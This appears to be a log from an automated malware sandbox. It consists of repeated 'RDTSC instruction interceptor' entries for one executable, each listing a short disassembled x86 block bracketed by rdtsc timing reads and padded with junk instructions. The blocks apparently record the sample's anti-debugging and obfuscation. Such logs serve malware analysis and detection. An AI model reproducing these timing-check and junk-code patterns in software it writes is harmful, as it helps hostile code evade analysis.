Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715121D second address: 715125C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007F804CF71E7Eh 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F804CF71E7Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715125C second address: 7151260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151260 second address: 7151266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151266 second address: 715126C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715126C second address: 7151270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151270 second address: 7151361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F804C8F2DA2h 0x00000012 jmp 00007F804C8F2DA5h 0x00000017 popfd 0x00000018 movzx eax, dx 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+0Ch] 0x0000001f pushad 0x00000020 call 00007F804C8F2DA9h 0x00000025 pushfd 0x00000026 jmp 00007F804C8F2DA0h 0x0000002b adc cl, 00000038h 0x0000002e jmp 00007F804C8F2D9Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 mov edx, 4F18D27Ch 0x0000003a popad 0x0000003b mov dword ptr [edx+0Ch], eax 0x0000003e pushad 0x0000003f jmp 00007F804C8F2DA1h 0x00000044 mov ecx, 6CDA4457h 0x00000049 popad 0x0000004a mov eax, dword ptr [esi+10h] 0x0000004d pushad 0x0000004e mov bx, si 0x00000051 mov al, 29h 0x00000053 popad 0x00000054 mov dword ptr [edx+10h], eax 0x00000057 jmp 00007F804C8F2DA7h 0x0000005c mov eax, dword ptr [esi+14h] 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 pushfd 0x00000063 jmp 00007F804C8F2D9Bh 0x00000068 add esi, 39B323BEh 0x0000006e jmp 00007F804C8F2DA9h 0x00000073 popfd 0x00000074 mov ebx, esi 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151361 second address: 7151367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151367 second address: 715136B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715136B second address: 71513B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e jmp 00007F804CF71E86h 0x00000013 mov eax, dword ptr [esi+18h] 0x00000016 jmp 00007F804CF71E80h 0x0000001b mov dword ptr [edx+18h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71513B5 second address: 71513B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71513B9 second address: 71513D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151548 second address: 715156E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, AC02h 0x00000007 jmp 00007F804C8F2DA3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715156E second address: 7151572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151572 second address: 7151578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151578 second address: 715157E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715157E second address: 7151582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151582 second address: 71515DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+28h], eax 0x0000000e pushad 0x0000000f call 00007F804CF71E7Eh 0x00000014 pushfd 0x00000015 jmp 00007F804CF71E82h 0x0000001a sbb ax, 9858h 0x0000001f jmp 00007F804CF71E7Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 mov ah, dl 0x00000028 popad 0x00000029 mov ecx, dword ptr [esi+2Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71515DF second address: 71515E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71515E3 second address: 71515E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71515E9 second address: 7151671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804C8F2DA2h 0x00000009 adc cl, FFFFFFE8h 0x0000000c jmp 00007F804C8F2D9Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F804C8F2DA8h 0x00000018 sbb cx, 3C48h 0x0000001d jmp 00007F804C8F2D9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov dword ptr [edx+2Ch], ecx 0x00000029 jmp 00007F804C8F2DA6h 0x0000002e mov ax, word ptr [esi+30h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F804C8F2DA7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151671 second address: 7151689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151689 second address: 71516C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F804C8F2DA7h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F804C8F2DA5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71516C7 second address: 71516FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F804CF71E88h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71516FC second address: 715170B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715170B second address: 7151711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151711 second address: 7151715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151715 second address: 715174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007F804CF71E87h 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F804CF71E80h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715174E second address: 715175D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715175D second address: 715179C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F804CF71E88h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715179C second address: 71517A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71517A2 second address: 71517B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71517B3 second address: 7151834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F80BAEA0CE3h 0x00000011 jmp 00007F804C8F2D9Eh 0x00000016 or dword ptr [edx+38h], FFFFFFFFh 0x0000001a jmp 00007F804C8F2DA0h 0x0000001f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000023 jmp 00007F804C8F2DA0h 0x00000028 or dword ptr [edx+40h], FFFFFFFFh 0x0000002c jmp 00007F804C8F2DA0h 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F804C8F2DA7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151834 second address: 715183B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0B9A second address: 71A0BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5CFEh 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov ecx, 12A512F3h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BB1 second address: 71A0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F804CF71E83h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BD1 second address: 71A0BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BD5 second address: 71A0BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BDB second address: 71A0BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BE1 second address: 71A0C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 pushfd 0x00000011 jmp 00007F804CF71E80h 0x00000016 adc ch, FFFFFF88h 0x00000019 jmp 00007F804CF71E7Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0C12 second address: 71A0C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71406EA second address: 71406F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0671 second address: 70E0675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0675 second address: 70E067B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E067B second address: 70E0681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0681 second address: 70E0685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0685 second address: 70E0689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0AB4 second address: 70E0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0ACB second address: 70E0B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F804C8F2DA4h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F804C8F2DA0h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov dx, ax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0B01 second address: 70E0B32 instructions: 0x00000000 rdtsc 0x00000002 call 00007F804CF71E88h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F804CF71E81h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711003A second address: 711008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F804C8F2DA3h 0x00000013 and ch, 0000001Eh 0x00000016 jmp 00007F804C8F2DA9h 0x0000001b popfd 0x0000001c mov esi, 6658D3E7h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711008A second address: 71100B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F804CF71E81h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71100B1 second address: 71100BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov eax, 59593AB7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71100BE second address: 7110130 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F804CF71E7Ch 0x00000008 xor ch, FFFFFFA8h 0x0000000b jmp 00007F804CF71E7Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F804CF71E86h 0x0000001b and esp, FFFFFFF0h 0x0000001e jmp 00007F804CF71E80h 0x00000023 sub esp, 44h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov edi, 20E4C950h 0x0000002e call 00007F804CF71E89h 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110130 second address: 7110156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b jmp 00007F804C8F2DA0h 0x00000010 movzx eax, bx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110156 second address: 7110178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 mov eax, 6689F12Bh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110178 second address: 7110191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6F7709D2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804C8F2D9Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110191 second address: 71101FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804CF71E7Fh 0x00000009 adc eax, 2E76567Eh 0x0000000f jmp 00007F804CF71E89h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F804CF71E80h 0x0000001b jmp 00007F804CF71E85h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, 37D87DF9h 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71101FA second address: 711020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711020C second address: 7110210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110210 second address: 7110264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F804C8F2DA7h 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F804C8F2D9Bh 0x00000018 add ax, CBFEh 0x0000001d jmp 00007F804C8F2DA9h 0x00000022 popfd 0x00000023 mov cx, 5847h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110264 second address: 711028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F804CF71E81h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711028E second address: 7110292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110292 second address: 7110296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110296 second address: 711029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711029C second address: 71102C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804CF71E7Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71102C3 second address: 71102C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71102C9 second address: 7110334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 call 00007F804CF71E88h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+24h], 00000000h 0x00000017 jmp 00007F804CF71E81h 0x0000001c lock bts dword ptr [edi], 00000000h 0x00000021 jmp 00007F804CF71E7Eh 0x00000026 jc 00007F80BCD43F92h 0x0000002c jmp 00007F804CF71E80h 0x00000031 pop edi 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov di, ax 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110334 second address: 711035E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2C639A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov di, ax 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F804C8F2DA8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711035E second address: 7110362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110362 second address: 7110368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110368 second address: 7110387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d popad 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110387 second address: 711038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711038B second address: 7110391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110391 second address: 7110396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110396 second address: 71103A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71103A4 second address: 71103AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 714075A second address: 7140760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140760 second address: 714077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
